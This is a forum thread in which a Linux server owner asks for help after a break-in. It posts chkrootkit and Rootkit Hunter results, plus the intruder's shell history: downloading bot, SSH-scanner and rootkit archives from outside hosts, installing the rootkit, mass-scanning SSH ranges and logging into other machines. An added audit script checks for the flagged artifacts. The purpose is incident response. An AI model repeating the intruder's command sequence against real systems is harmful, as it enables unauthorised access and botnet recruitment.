I've been hacked

Moved my Mandrake 9.2 from one hosting company to another and the new company didn't block SSH traffic to it, and within 2 days I've been hacked.

They still haven't blocked traffic to it, so I now have to shut down sshd every time I've finished working on it. I cannot afford to clear the machine and start again on it, so I need to do my best to clean it and lock it down, so I really need some help from you guys and any help at all is appreciated.

I'll just start by saying that I have already deleted several accounts the hacker made, and I have also replaced /sbin/init because the system would not let me restart; it kept saying something like "FUCK: trying to hack kernel" or something like that anyway.

Also, this is the bottom of my /etc/rc.d/rc.sysinit file:

# Xntps (NTPv3 daemon) startup..
/usr/sbin/xntps -q

which I read isn't good.

I'll post the results from chkrootkit and Rootkit Hunter, along with the history that the user left, and also their IP addresses:

CHKROOTKIT:

ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not infected
Checking `mingetty'... not infected
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... INFECTED
Checking `rpcinfo'... not infected
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not found
Checking `sshd'... not infected
Checking `syslogd'... not infected
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
Checking `traceroute'... not found
Checking `vdir'... not infected
Checking `w'... not infected
Checking `write'... not infected
Checking `aliens'... /etc/ld.so.hash
Searching for sniffer's logs, it may take a while... nothing found
Searching for HiDrootkit's default dir... nothing found
Searching for t0rn's default files and dirs... nothing found
Searching for t0rn's v8 defaults... Possible t0rn v8 \(or variation\) rootkit installed
Searching for Lion Worm default files and dirs... nothing found
Searching for RSHA's default files and dir... nothing found
Searching for RH-Sharpe's default files... nothing found
Searching for Ambient's rootkit (ark) default files and dirs... nothing found
Searching for suspicious files and dirs, it may take a while... /lib/security/.config /lib/security/.config
Searching for LPD Worm files and dirs... nothing found
Searching for Ramen Worm files and dirs... nothing found
Searching for Maniac files and dirs... nothing found
Searching for RK17 files and dirs... nothing found
Searching for Ducoci rootkit... nothing found
Searching for Adore Worm... nothing found
Searching for ShitC Worm... nothing found
Searching for Omega Worm... nothing found
Searching for Sadmind/IIS Worm... nothing found
Searching for MonKit... nothing found
Searching for Showtee... Warning: Possible Showtee Rootkit installed
Searching for OpticKit... nothing found
Searching for T.R.K... nothing found
Searching for Mithra... nothing found
Searching for OBSD rk v1... nothing found
Searching for LOC rootkit... nothing found
Searching for Romanian rootkit... /usr/include/file.h /usr/include/proc.h
Searching for HKRK rootkit... nothing found
Searching for Suckit rootkit... nothing found
Searching for Volc rootkit... nothing found
Searching for Gold2 rootkit... nothing found
Searching for TC2 Worm default files and dirs... nothing found
Searching for Anonoying rootkit default files and dirs... nothing found
Searching for ZK rootkit default files and dirs... nothing found
Searching for ShKit rootkit default files and dirs... Possible ShKit rootkit installed
Searching for AjaKit rootkit default files and dirs... nothing found
Searching for zaRwT rootkit default files and dirs... nothing found
Searching for Madalin rootkit default files... nothing found
Searching for Fu rootkit default files... nothing found
Searching for ESRK rootkit default files... nothing found
Searching for rootedoor... nothing found
Searching for anomalies in shell history files... nothing found
Checking `asp'... not infected
Checking `bindshell'... not infected
Checking `lkm'...
Checking `rexedcs'... not found
Checking `sniffer'... not tested: can't exec ./ifpromisc
Checking `w55808'... not infected
Checking `wted'... not tested: can't exec ./chkwtmp
Checking `scalper'... not infected
Checking `slapper'... not infected
Checking `z2'... not tested: can't exec ./chklastlog
Checking `chkutmp'... not tested: can't exec ./chkutmp

ROOT KIT HUNTER:

Rootkit Hunter 1.1.1 is running
Determining OS... Ready
Checking binaries
* Selftests
Strings (command) [ OK ]
* System tools
Performing 'known good' check...
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ BAD ]
/sbin/ifstatus [ OK ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ BAD ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/egrep [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/id [ OK ]
/bin/kill [ OK ]
/bin/login [ BAD ]
/bin/ls [ BAD ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/netstat [ BAD ]
/bin/ps [ BAD ]
/bin/sh [ OK ]
/bin/su [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/du [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ BAD ]
/usr/bin/head [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/login [ BAD ]
/usr/bin/lsattr [ OK ]
/usr/bin/md5sum [ BAD ]
/usr/bin/passwd [ BAD ]
/usr/bin/top [ BAD ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ BAD ]
/usr/bin/whereis [ OK ]
/usr/bin/who [ OK ]
Check rootkits
* Default files and directories
Rootkit '55808 Trojan - Variant A'... [ OK ]
Rootkit 'AjaKit'... [ OK ]
Rootkit 'aPa Kit'... [ OK ]
Rootkit 'Apache Worm'... [ OK ]
Rootkit 'Ambient (ark) Rootkit'... [ OK ]
Rootkit 'Balaur Rootkit'... [ OK ]
Rootkit 'BeastKit'... [ OK ]
Rootkit 'BOBKit'... [ OK ]
Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ]
Rootkit 'Danny-Boy's Abuse Kit'... [ OK ]
Rootkit 'Devil RootKit'... [ OK ]
Rootkit 'Dica'... [ OK ]
Rootkit 'Dreams Rootkit'... [ OK ]
Rootkit 'Duarawkz'... [ OK ]
Rootkit 'Flea Linux Rootkit'... [ Warning! ]
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------
Rootkit 'FreeBSD Rootkit'... [ OK ]
Rootkit 'Fuck`it Rootkit'... [ OK ]
Rootkit 'GasKit'... [ OK ]
Rootkit 'Heroin LKM'... [ OK ]
Rootkit 'HjC Kit'... [ OK ]
Rootkit 'ignoKit'... [ OK ]
Rootkit 'ImperalsS-FBRK'... [ OK ]
Rootkit 'Irix Rootkit'... [ OK ]
Rootkit 'Kitko'... [ OK ]
Rootkit 'Knark'... [ OK ]
Rootkit 'Li0n Worm'... [ OK ]
Rootkit 'Lockit / LJK2'... [ OK ]
Rootkit 'MRK'... [ OK ]
Rootkit 'RootKit for SunOS / NSDAP'... [ OK ]
Rootkit 'Optic Kit (Tux)'... [ OK ]
Rootkit 'Oz Rootkit'... [ OK ]
Rootkit 'Portacelo'... [ OK ]
Rootkit 'R3dstorm Toolkit'... [ OK ]
Sebek LKM [ OK ]
Rootkit 'Scalper Worm'... [ OK ]
Rootkit 'Shutdown'... [ OK ]
Rootkit 'SHV4'... [ Warning! ]
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------
Rootkit 'Sin Rootkit'... [ OK ]
Rootkit 'Slapper'... [ OK ]
Rootkit 'Sneakin Rootkit'... [ OK ]
Rootkit 'Suckit Rootkit'... [ OK ]
Rootkit 'SunOS Rootkit'... [ Warning! ]
--------------------------------------------------------------------------------
Found parts of this rootkit/trojan by checking the default files and directories
Please inspect the available files, by running this check with the parameter
--createlogfile and check the log file (current file: /dev/null).
--------------------------------------------------------------------------------
Rootkit 'Superkit'... [ OK ]
Rootkit 'TBD (Telnet BackDoor)'... [ OK ]
Rootkit 'TeLeKiT'... [ OK ]
Rootkit 'T0rn Rootkit'... [ OK ]
Rootkit 'Trojanit Kit'... [ OK ]
Rootkit 'Tuxtendo'... [ OK ]
Rootkit 'URK'... [ OK ]
Rootkit 'VcKit'... [ OK ]
Rootkit 'Volc Rootkit'... [ OK ]
Rootkit 'X-Org SunOS Rootkit'... [ OK ]
Rootkit 'zaRwT.KiT Rootkit'... [ OK ]
* Suspicious files and malware
Scanning for known rootkit files [ OK ]
Miscellaneous Login backdoors [ OK ]
Miscellaneous directories [ OK ]
Sniffer logs [ OK ]
* Trojan specific characteristics
shv4
Checking /etc/rc.d/rc.sysinit
Test 1 [ Clean ]
Test 2 [ Clean ]
Test 3 [ Clean ]
Checking /etc/inetd.conf [ Not found ]
* Suspicious file properties
chmod properties
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
Script replacements
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
* OS dependant tests
Linux
Checking loaded kernel modules... [ OK ]
Networking
* Check: frequently used backdoors
Port 2001: Scalper Rootkit [ OK ]
Port 2006: CB Rootkit [ OK ]
Port 2128: MRK [ OK ]
Port 14856: Optic Kit (Tux) [ OK ]
Port 47107: T0rn Rootkit [ OK ]
Port 60922: zaRwT.KiT [ OK ]
* Interfaces
Scanning for promiscuous interfaces [ OK ]
System checks
* Allround tests
Checking hostname... Found. Hostname is xxxx
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
Checking rc.d files...
Processing........................................
Result rc.d files check [ OK ]
Checking history files
Bourne Shell [ OK ]
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files... [ OK ]
Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config... Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
Hint: see logfile for more information
info: PermitRootLogin yes
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning ]
info: Users can use SSH1-protocol (see logfile for more information).
* Check: Events and Logging
Search for syslog configuration... found
Checking for running syslog slave... [ OK ]
Checking for logging to remote system... [ OK (no remote logging) ]
---------------------------- Scan results ----------------------------
MD5
MD5 compared: 63
Incorrect MD5 checksums: 12
File scan
Scanned files: 309
Possible infected files: 3
Possible rootkits:
Flea Linux Rootkit
SHV4
SunOS Rootkit
Scanning took 25 seconds
-----------------------------------------------------------------------
Do you have some problems, undetected rootkits, false positives, ideas or suggestions?
Please e-mail me by filling in the contact form
-----------------------------------------------------------------------

HISTORY:

266 w
267 passwd
268 uname -a
269 cat /proc/cpuinfo
270 uname -a
271 exit
272 w
273 /sbin/ifconfig |grep inet
274 cd /home
275 ls
276 passwd
277 ls
278 useradd craig
279 passwd craig
280 cd /var/tmp
281 cd /tmp
282 cd /var/tmp
283 mkdir ...
284 cd ...
285 wget
286 wget shadowhk.from.ro/bots.tgz
287 tar xzvf bots.tgz
288 rm -rf bots.tgz
289 mv mech in
290 cd in
291 ls
292 pico
293 nano
294 cd ..
295 ls
296 rm -rf in
297 wget users.rol.ro/valitos/Scanner/morfi.gz
298 tar xzvf morfi.gz
299 rm -rf morfi.gz
300 cd morfi
301 ./scan 217.10
302 ./go.sh 217.10
303 rm -rf mfu.txt
304 ./go.sh 212.111
305 ./ssh-scan 100
306 rm -rf mfu.txt
307 ./go.sh 194.97
308 ./go.sh 193.231
309 ./go.sh 208.181
310 ./go.sh 207.236
311 ./go.sh 217.10
312 ./scan 217.10
313 ./go.sh 210.249
314 ./ss 22 -b 210.249 -s 10
315 ./ss 22 -b 148.74 -s 10
316 cd ..
317 ls
318 rm -rf morfi
319 wget geocities.com/larishate/rootkit.tgz
320 tar xzvf rootkit.tgz
321 rm -rf rootkit.tgz
322 cd rootkit
323 ./setup cinema123 55555
324 cd ..
325 ls
326 rm -rf H4ck3rZ rootkit/
327 exit
328 w
329 uname -a
330 cat /etc/issue
331 useradd luka
332 useradd john
333 passwd john
334 cd /home
335 ls
336 passwd bf2
337 exit
338 useradd craig
339 useradd luka
340 passwd luka
341 cd /var/tmp
342 cd /tmp/...
343 ls -a
344 wget users.rol.ro/valitos/Scanner/morfi.gz
345 tar xzvf morfi.gz
346 rm -rf morfi.gz
347 cd morfi
348 ./go.sh 134.75 -s 10
349 ./go.sh 217.10
350 ./scan 134.75
351 ./scan 64.7
352 ps -x
353 ./ssh-scan 100&
354 exirt
355 exit
356 vi /home/newcomers_cod2/cod2-server/awe3b3/awe.cfg #
357 w
358 cd /var/tmp/...
359 cd /tmp/...
360 ls -a
361 cd morfi
362 cat vuln.txt
363 ./go.sh 217.10
364 ./scan 210.59
365 ps -x
366 ./ss 22 -b 217.20 -s 10
367 mv bios.txt mfu.txt
368 ./ssh-scan 100
369 rm -rf mfu.txt
370 ./ss 22 -b 218.188 -s 10
371 mv bios.txt mfu.txt
372 ./ssh-scan 100
373 rm -rf mfu.txt
374 ./ss 22 -b 216.35 -s 10
375 mv bios.txt mfu.txt
376 ./ssh-scan 100
377 rm -rf mfu.txt
378 ./ss 22 -b 85.36 -s 10
379 mv bios.txt mfu.txt
380 ./ssh-scan 10
381 ./ssh-scan 100
382 rm -rf mfu.txt
383 ./ss 22 -b 196.2 -s 10
384 mv bios.txt mfu,txt
385 mv mfu,txt mfu.txt
386 ./ssh-scan 100
387 rm -rf mfu.txt
388 ./ss 22 -b 217.25 -s 10
389 mv bios.txt mfu.txt
390 ./ssh-scan 100
391 ssh root@195.199.207.129
392 clear
393 rm -rf mfu.txt
394 ./ss 22 -b 207.225 -s 10
395 mv bios.txt mfu.txt
396 ./ssh-scan 100
397 rm -rf mfu.txt
398 ./ss 22 -b 216.183 -s 10
399 mv bios.txt mfu.txt
400 ./ssh-scan 100
401 ssh cisco@216.183.118.170
402 ssh cisco@216.183.118.174
403 w
404 uname -a
405 cat vuln.txt
406 rm -rf mfu.txt
407 ./ss 22 -b 206.210 -s 10
408 mv bios.txt mfu.txt
409 ./ssh-scan 100
410 ./ssh-scan 100&
411 exit
412 cd /var/tmp/.../morfi
413 cd /tmp/.../morfi
414 ./ss 22 -b 217.10 -s 10
415 exit
416 cd /var/tmp/.../morfi
417 cd /tmp/morfi
418 cd /tmp/.../morfi
419 cat vuln.txt
420 ls
421 ./ssh-scan 100
422 rm -rf mfu.txt
423 clear
424 ./ss 22 -b 64.207 -s 10
425 mv bios.txt mfu.txt
426 ./ssh-scan 100
427 rm -rf mfu.txt
428 ./ss 22 -a 133 -s 10
429 mv bios.txt mfu.txt
430 ./ssh-scan 100
431 rm -rf mfu.txt
432 ./ss 22 -b 81.199 -s 10
433 mv bios.txt mfu.txt
434 ./ssh-scan 100
435 rm -rf mfu.txt
436 ./ss 22 -b 199.77 -s 10
437 ./ss 22 -b 194.176 -s 10
438 mv bios.txt mfu.txt
439 ./ssh-scan 100
440 rm -rf mfu.txt
441 ./ss 22 -b 212.192 -s 10
442 ./ss 22 -b 131.1 -s 10
443 ./ss 22 -b 195.159 -s 10
444 mv bios.txt mfu.txt
445 ./ssh-scan 100
446 rm -rf mfu.txt
447 ./ss 22 -b 205.139 -s 10
448 mv bios.txt mfu.txt
449 ./ssh-scan 100
450 rm -rf mfu.txt
451 ./ss 22 -b 63.251 -s 10
452 mv bios.txt mfu.txt
453 ./ssh-scan 100
454 rm -rf mfu.txt
455 ./ss 22 -b 217.89 -s 10
456 mv bios.txt mfu.txt
457 ./ssh-scan 100
458 rm -rf mfu.txt
459 ./ss 22 -b 4.3 -s 10
460 mv bios.txt mfu.txt
461 ./ssh-scan 100
462 rm -rf mfu.txt
463 ./ss 22 -b 151.4 -s 10
464 ./ss 22 -b 210.228 -s 10
465 ./ss 22 -b 132.254 -s 10
466 ./ss 22 -b 217.20 -s 10
467 ./ss 22 -a 217.10 -s 10
468 ./scan 217.10
469 ./ss 22 -b 62.85 -s 10
470 ./ss 22 -b 66.20 -s 10
471 mv bios.txt mfu.txt
472 ./ssh-scan 100
473 rm -rf mfu.txt
474 ./ss 22 -b 62.146 -s 10
475 mv bios.txt mfu.txt
476 ./ssh-scan 100
477 exit
478 cd /tmp/.../morfi
479 rm -rf mfu.txt
480 ./ss 22 -b 196.15 -s 10
481 mv bios.txt mfu.txt
482 ./ssh-scan 100
483 rm -rf mfu.txt
484 ./ss 22 -b 63.142 -s 10
485 rm -rf mfu.txt
486 ./ss 22 -b 66.150 -s 10
487 exit
488 cd /tmp/.../morfi
489 ./scan 217.10
490 ./go.sh 217.10
491 exit
492 cd /tmp/.../morfi
493 ./ss 22 -b 64.35 -s 10
494 ./ss 22 -b 217.10 -s 10
495 exit
496 cd /tmp/.../morfi
497 ./go.sh 217.10
498 ./ss 22 -b 207.38 -s 10
499 mv bios.txt mfu.txt
500 ./ssh-scan 100
501 cd /tmp/.../morfi
502 cat vuln.txt
503 rm -rf mfu.txt
504 ./ss 22 -b 32.97 -s 10
505 mv bios.txt mfu.txt
506 ./ssh-scan 100
507 rm -rf mfu.txt
508 ./ss 22 -b 210.142 -s 10
509 mv bios.txt mfu.txt
510 ./ssh-scan 100
511 rm -rf mfu.txt
512 ./ss 22 -b 63.161 -s 10
513 mv bios.txt mfu.txt
514 ./ssh-scan 100
515 rm -rf mfu.txt
516 ./ss 22 -b 62.49 -s 10
517 ./go.sh 217.10
518 exit
519 cd /tmp/.../morfi
520 ./ss 22 -b 192.116 -s 10
521 ./ss 22 -b 195.74 -s 10
522 exit
523 cd /tmp/.../morfi
524 ./ss 22 -b 131.178 -s 10
525 exit
526 cd /tmp/.../morfi
527 ./ss 22 -b 151.17 -s 10
528 ./ss 22 -b 151.17 -s 6
529 ./ss 22 -b 217.10 -s 6
530 exit
531 cd /tmp/.../morfi
532 ./ss 22 -b 65.89 -s 10
533 exit
534 cd /tmp/.../morfi
535 ./ss 22 -b 69.46 -s 10
536 ./ss 22 -b 217.10 -s 10
537 ./scan 69.46
538 ./scan 151.17
539 ./scan 196.22
540 ./scan 61.39
541 exit
542 cd /tmp/.../morfi
543 rm -rf mfu.txt
544 ./ss 22 -b 193.70 -s 10
545 clear
546 w
547 ./go.sh 202.28
548 ./scan 202.28
549 ./ss 22 -b 217.10 -s 10
550 rm -rf mfu.txt
551 ./ss 22 -b 210.163 -s 10
552 mv bios.txt mfu.txt
553 ./ssh-scan 100
554 rm -rf mfu.txt
555 ./ss 22 -b 212.179 -s 10
556 ./ss 22 -b 217.19 -s 10
557 ./ss 22 -b 198.26 -s 10
558 ./ss 22 -a 198. -s 10
559 cat bios.txt
560 ./ss 22 -a 198. -s 10
561 ./ss 22 -b 212.108 -s 10
562 w
563 clear
564 ./ss 22 -b 65.89 -s 10
565 ./scan 65.89
566 exit
567 cd /tmp/.../morfi
568 ./ss 22 -b 131.234 -s 10
569 mv bios.txt mfu.txt
570 ./ssh-scan 100
571 rm -rf mfu.txt
572 ./ss 22 -b 129.194 -s 10
573 mv bios.txt mfu.txt
574 ./ssh-scan 100
575 rm -rf mfu.txt
576 ./ss 22 -b 131.234 -s 10
577 ./ss 22 -b 209.185 -s 10
578 exit
579 cd /tmp/.../morfi
580 cat vuln.txt
581 rm -rf mfu.txt
582 ./ss 22 -b 209.226 -s 10
583 mv bios.txt mfu.txt
584 ./ssh-scan 100
585 rm -rf mfu.txt
586 ./ss 22 -b 63.143 -s 10
587 ./ss 22 -b 64.210 -s 10
588 mv bios.txt mfu.txt
589 ./ssh-scan 100
590 rm -rf mfu.txt
591 ./ss 22 -b 68.153 -s 10
592 mv bios.txt mfu.txt
593 ./ssh-scan 100
594 rm -rf mfu.txt
595 ./ss 22 -b 129.33 -s 10
596 mv bios.txt mfu.txt
597 ./ssh-scan 100
598 clear
599 rm -rf mfu.txt
600 ./ss 22 -b 142.179 -s 10
601 mv bios.txt mfu.txt
602 ./ssh-scan 100
603 clear
604 exit
605 cd /tmp/.../morfi
606 rm -rf mfu.txt
607 ./ss 22 -b 207.104 -s 10
608 mv bios.txt mfu.txt
609 ./ssh-scan 100
610 rm -rf mfu.txt
611 ./ss 22 -b 209.123 -s 10
612 mv bios.txt mfu.txt
613 ./ssh-scan 100
614 rm -rf mfu.txt
615 ./ss 22 -b 81.201 -s 10
616 mv bios.txt mfu.txt
617 ./ssh-scan 100
618 rm -rf mfu.txt
619 ./ss 22 -b 196.35 -s 10
620 ./ss 22 -b 216.77 -s 10
621 exit
622 cd /tmp/.../morfi
623 ./ss 22 -b 4.35 -s 10
624 ./ss 22 -b 217.10 -s 10
625 ./scan 128.32
626 ls -a
627 cd ..
628 w
629 exit

IP ADDRESSES:

194.116.141.81
203.153.167.3
194.116.141.81
194.242.114.44

Like I say, ideally I'd like to clean this up and lock it down, so any help would be really appreciated. Thanks for your time.
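The findings in the post above can be re-checked with a small POSIX sh script: the files chkrootkit flagged, the hidden /tmp/... working directory from the history, the xntps line in rc.sysinit, and the PermitRootLogin / SSH1 settings rkhunter warned about. This is example code added for this thread, not anything the poster or the tools produced; the sample tree it builds is constructed to mirror the state described in the post, and the check functions take a root directory so they can be run over a mounted copy of the disk from a trusted system, since ls, find and md5sum on the live box were themselves reported BAD.

```shell
#!/bin/sh
# Added example, not code from the thread. Re-checks the concrete findings the
# chkrootkit / rkhunter runs above reported, against a root directory passed as
# an argument, so it can be run over a mounted copy of the disk rather than
# through the trojaned binaries (ls, ps, netstat, find, md5sum) on the live box.
# Every path and setting below is taken from the output posted in the thread.

# Report the two sshd_config settings rkhunter warned about.
# Findings go to stderr; the number of findings is printed on stdout.
audit_sshd_config() {
    cfg="$1"; n=0
    if grep -Eiq '^[[:space:]]*PermitRootLogin[[:space:]]+yes' "$cfg"; then
        echo "WARN: $cfg: PermitRootLogin yes (set it to no)" >&2
        n=$((n + 1))
    fi
    # "Protocol 1" and "Protocol 2,1" both leave SSH1 enabled; a missing
    # Protocol line is reported too so that it gets set explicitly.
    if ! grep -Eiq '^[[:space:]]*Protocol[[:space:]]+2[[:space:]]*$' "$cfg"; then
        echo "WARN: $cfg: SSH1 not ruled out (set Protocol 2)" >&2
        n=$((n + 1))
    fi
    echo "$n"
}

# Look for the on-disk artifacts chkrootkit flagged, the hidden "..."
# working directories from the shell history, and the xntps line appended
# to rc.sysinit. Same output convention as above.
count_rootkit_artifacts() {
    root="${1%/}"; n=0
    for f in /lib/security/.config /etc/ld.so.hash \
             /usr/include/file.h /usr/include/proc.h /tmp/... /var/tmp/...; do
        if [ -e "$root$f" ]; then
            echo "FOUND: $root$f" >&2
            n=$((n + 1))
        fi
    done
    if grep -qs 'xntps' "$root/etc/rc.d/rc.sysinit"; then
        echo "FOUND: xntps startup hook in $root/etc/rc.d/rc.sysinit" >&2
        n=$((n + 1))
    fi
    echo "$n"
}

# Constructed sample tree mirroring the state described in the post, so the
# checks can be exercised offline. Prints the path of the temporary root.
make_sample_root() {
    root=$(mktemp -d)
    mkdir -p "$root/etc/ssh" "$root/etc/rc.d" "$root/lib/security" "$root/tmp/..."
    printf 'Protocol 2,1\nPermitRootLogin yes\n' > "$root/etc/ssh/sshd_config"
    printf 'Protocol 2\nPermitRootLogin no\n' > "$root/etc/ssh/sshd_config.hardened"
    printf '# Xntps (NTPv3 daemon) startup..\n/usr/sbin/xntps -q\n' > "$root/etc/rc.d/rc.sysinit"
    : > "$root/lib/security/.config"
    echo "$root"
}

# Stand-alone run against the constructed sample; point the two check
# functions at a mounted copy of the real disk instead.
sample=$(make_sample_root)
echo "weak sshd_config findings:     $(audit_sshd_config "$sample/etc/ssh/sshd_config")"
echo "hardened sshd_config findings: $(audit_sshd_config "$sample/etc/ssh/sshd_config.hardened")"
echo "rootkit artifacts found:       $(count_rootkit_artifacts "$sample")"
rm -rf "$sample"
```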
Having sshd running shouldn't be a problem; it's most likely poor usernames and passwords being used and not changed since you've migrated. And are you sure this is a dedicated server all on your own? Most host companies make clients share with other clients, which could be another cause of it getting hacked.
Please do not post the same thread in more than one forum. Picking the most relevant forum and posting it once there makes it easier for other members to help you and keeps the discussion all in one place.
http://www.linuxquestions.org/rules.php

Even though you might not like the first answer, IMO it is the best course of action.
Fair enough, just thought I might have more views, and more relevant ones, in this area.

Thanks. P.S. It's definitely my own box, not shared.
Continue here: http://www.linuxquestions.org/questi...d.php?t=392520